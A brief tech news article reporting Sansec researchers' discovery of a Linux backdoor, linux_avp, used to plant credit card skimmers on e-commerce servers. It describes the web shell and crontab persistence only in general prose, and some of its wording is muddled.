HomeUpdateHackers targeting e-commerce sites using Linux backdoor

Hackers targeting e-commerce sites using Linux backdoor

-

Last Updated on 26/11/2021 by Anamika

Reportedly, cybercriminals are now using a new kind of hacking campaign that is using Linux backdoor on e-commerce websites. It includes deploying a credit card skimmer on the websites.

The researchers at Sansec Threat Research were able to find a new malicious malware/agent named linux_avp which is known to hide as a system process on e-commerce website servers.

The hackers have been deploying this malware since mid-November and are targeting the control servers in Beijing.

The main aim of the attackers to use Link backdoor is to find out the weaknesses of various e-commerce websites and make the websites vulnerable at once, causing major harm.

“After a day and a half, the attacker found a file upload vulnerability in one of the store’s plugins. S/he then uploaded a web shell and modified the server code to intercept customer data” 

According to the reports of ITPro

The malware also has a way to get into the servers which have been removed or rebooted. It uses malicious crontab entry and it then downloads the Golang malware to execute to a random writable dictionary which further installs two configuration files.

The malware is affecting a lot of e-commerce websites at large but the reason is still not clear that why is it just being targeting the servers from Beijing?

Anamika
Anamika
Anamika focuses on data privacy, data policy, digital policies, and puts users' privacy first. She loves exploring new tech and spends time looking around business politics and its impact on users and small businesses.
- Advertisment -[the_ad id="13487"]

Must Read